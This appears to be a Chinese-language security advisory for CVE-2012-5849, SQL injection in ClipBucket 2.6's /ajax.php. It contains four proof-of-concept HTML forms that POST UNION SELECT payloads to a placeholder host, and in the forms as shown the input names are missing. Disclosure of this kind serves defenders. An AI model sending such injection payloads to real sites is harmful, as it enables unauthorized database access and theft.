发布日期:2012-12-05
更新日期:2012-12-11
受影响系统:
ClipBucket ClipBucket 2.6 Revision 738
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 56854
CVE(CAN) ID: CVE-2012-5849
ClipBucket是开源的自由视频共享软件。
ClipBucket 2.6 Revision 738及之前版本对"/ajax.php"脚本内的多个参数值过滤不正确,远程攻击者可通过发送特制的HTTP POST请求,导致在应用的数据库内执行任意SQL查询。受影响参数包括:"uid"、"id" 、"cid"、"ci_id"
<*来源:High-Tech Bridge Security Research Lab
链接:https://www.htbridge.com/advisory/HTB23125
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
PoC 1:
<form action="http://[host]/ajax.php" method="post">
<input type="hidden" value="add_friend" />
<input type="hidden" value="' UNION SELECT 1,2,3,4,5,6,7,version(),9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4, 5,6,7,8,9,10 -- " />
<input type="submit">
</form>
PoC 2:
<form action="http://[host]/ajax.php" method="post">
<input type="hidden" value="get_item" />
<input type="hidden" value="[videos|photos]" />
<input type="hidden" value="0 UNION SELECT 1,2,3,4,5,6,7,version(),9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4, 5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9 -- " />
<input type="hidden" value="" />
<input type="submit">
</form>
PoC 3:
<form action="http://[host]/ajax.php" method="post">
<input type="hidden" value="get_item" />
<input type="hidden" value="[videos|photos]" />
<input type="hidden" value="" />
<input type="hidden" value="0 UNION SELECT 1,2,3,4,5,6,7,version(),9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4, 5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9 -- " />
<input type="submit">
</form>
PoC 4:
<form action="http://[host]/ajax.php" method="post">
<input type="hidden" value="load_more_items" />
<input type="hidden" value="[videos|photos]" />
<input type="hidden" value="0' UNION SELECT 1,2,3,4,5,6,7,version(),9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4, 5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9 -- " />
<input type="submit">
</form>
建议:
--------------------------------------------------------------------------------
厂商补丁:
ClipBucket
----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: